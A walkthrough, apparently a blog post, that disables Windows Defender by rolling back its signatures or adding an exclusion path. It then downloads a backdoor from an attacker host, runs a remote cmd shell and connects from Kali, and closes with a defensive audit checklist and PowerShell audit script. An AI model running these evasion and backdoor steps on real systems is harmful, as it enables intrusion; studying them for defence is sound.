When we try to download a backdoor program, Windows Defender blocks the file:

Invoke-WebRequest -uri "http://192.168.1.17/sbd.exe" -OutFile ".\sbd.exe"

View the Windows Defender threats by using the Defender PowerShell module:

Get-MpThreat

CategoryID       : 8
DidThreatExecute : True
IsActive         : False
Resources        : {file:_C:\Users\Mambo Yoyo\clone.exe, file:_C:\Users\Mambo Yoyo\sbd.exe, process:_pid:6560,ProcessStart:130877310747205268, process:_pid:6752,ProcessStart:130876708785643534}
RollupStatus     : 97
SchemaVersion    : 1.0.0.0
SeverityID       : 4
ThreatID         : 2147626070
ThreatName       : Trojan:Win32/Trafog!rts
TypeID           : 0
PSComputerName   :
Most antivirus software runs as a protected service, so we can't stop or disable it, even from an administrative prompt:

net stop windefend
System error 5 has occurred.

Access is denied.

sc stop windefend
[SC] OpenService FAILED 5:
Access is denied.

Even if we try this as SYSTEM we get access denied:

.\psexec.exe -s cmd

PsExec v2.11 - Execute processes remotely
Copyright (C) 2001-2014 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>net stop windefend
System error 5 has occurred.

Access is denied.
In the GUI these functions are also not available.
One way to get our backdoor onto the system is to remove all virus definitions with the MpCmdRun.exe command line utility:

PS C:\Program Files\Windows Defender> .\MpCmdRun.exe -removedefinitions -all
Service Version: 4.8.207.0
Engine Version: 1.1.12101.0
AntiSpyware Signature Version: 1.207.1041.0
AntiVirus Signature Version: 1.207.1041.0
NIS Engine Version: 2.1.11804.0
NIS Signature Version: 115.22.0.0
Starting engine and signature rollback to none...
Done!

Now that we have removed all definitions, we can download our backdoor program:

Invoke-WebRequest -uri "http://192.168.1.17/sbd.exe" -OutFile ".\sbd.exe"

PS C:\Users\Mambo Yoyo> dir .\sbd.exe

    Directory: C:\Users\Mambo Yoyo

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         9/26/2015  10:44 AM      50176 sbd.exe
And we can also execute our backdoor!
.\sbd.exe -l -p 444 -r 5 -e cmd -c on

And connect to it…

root@kali:/var/www# sbd 192.168.1.8 444 -c on
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\Mambo Yoyo>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::d876:531d:e07c:f20%3
   IPv4 Address. . . . . . . . . . . : 192.168.1.8
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.1

When we update the Windows Defender signatures, our backdoor will be detected and removed:

C:\Program Files\Windows Defender> .\MpCmdRun.exe -signatureupdate
Signature update started . . .
Signature update finished.

Instead of removing the definitions we can also add an exclusion path:

C:\users\Mambo Yoyo> Set-MpPreference -ExclusionPath "C:\Users\Mambo Yoyo"
From a defence/audit perspective we have to verify that:
- Antivirus/antimalware software is installed
- Antivirus/antimalware software is running
- Antivirus/antimalware software is up-to-date (the definition rollback above leaves the engine with no signatures at all)
- Antivirus/antimalware exclusions/exceptions are reviewed (an exclusion path like the one above is a permanent blind spot)
- Antivirus/antimalware events are sent to a central log point
- Antivirus/antimalware events are monitored and analysed, and action is taken on them
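The following audit script is an added example (not part of the original post) that checks the points in this list on the local host with the same Defender PowerShell module and the Defender operational event log. The 30-day signature-age threshold, the 7-day event window and the choice of event IDs are assumptions made for this example; run it elevated.

```powershell
# Added audit example (not from the original post): checks the defensive controls listed above.
# Assumptions: run elevated on a host with the Defender module; the 30-day signature-age
# threshold and the 7-day event window are arbitrary values chosen for this example.
$MaxSignatureAgeDays = 30
$LookbackDays        = 7
$findings = New-Object System.Collections.Generic.List[string]

# 1) Installed and running: service, engine and real-time protection state.
$status = Get-MpComputerStatus -ErrorAction Stop
if (-not $status.AMServiceEnabled)          { $findings.Add("Antimalware service is not enabled") }
if (-not $status.AntivirusEnabled)          { $findings.Add("Antivirus engine is disabled") }
if (-not $status.RealTimeProtectionEnabled) { $findings.Add("Real-time protection is disabled") }

# 2) Up-to-date: an engine rolled back with 'MpCmdRun -removedefinitions' or never updated
#    shows up here as a stale or empty signature version.
if ($status.AntivirusSignatureAge -gt $MaxSignatureAgeDays) {
    $findings.Add("AV signatures are $($status.AntivirusSignatureAge) days old (version '$($status.AntivirusSignatureVersion)')")
}

# 3) Exclusions reviewed: every path/extension/process exclusion is a blind spot, so list them all.
$pref = Get-MpPreference
foreach ($p in @($pref.ExclusionPath))      { if ($p) { $findings.Add("Path exclusion: $p") } }
foreach ($e in @($pref.ExclusionExtension)) { if ($e) { $findings.Add("Extension exclusion: $e") } }
foreach ($x in @($pref.ExclusionProcess))   { if ($x) { $findings.Add("Process exclusion: $x") } }

# 4) Events: recent detections and configuration changes from the Defender operational log.
#    1116 = malware detected, 1117 = action taken, 5007 = configuration changed (e.g. a new
#    exclusion), 5001 = real-time protection disabled. Forward this log to your central collector.
$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-Windows Defender/Operational'
    Id        = 1116, 1117, 5001, 5007
    StartTime = (Get-Date).AddDays(-$LookbackDays)
} -ErrorAction SilentlyContinue
foreach ($ev in $events) {
    $firstLine = ($ev.Message -split "`n")[0]
    $findings.Add("Event $($ev.Id) at $($ev.TimeCreated): $firstLine")
}

# 5) Threats Defender has already recorded, including ones that ran before they were detected.
foreach ($t in Get-MpThreat) {
    $findings.Add("Threat $($t.ThreatName) (severity $($t.SeverityID), executed=$($t.DidThreatExecute))")
}

if ($findings.Count -eq 0) { "No findings." } else { $findings }
```

On a host where the rollback or exclusion from this post was applied, the script reports the stale signature version, the "C:\Users\Mambo Yoyo" path exclusion and the 5007 configuration-change event, which is what a central monitoring rule should alert on.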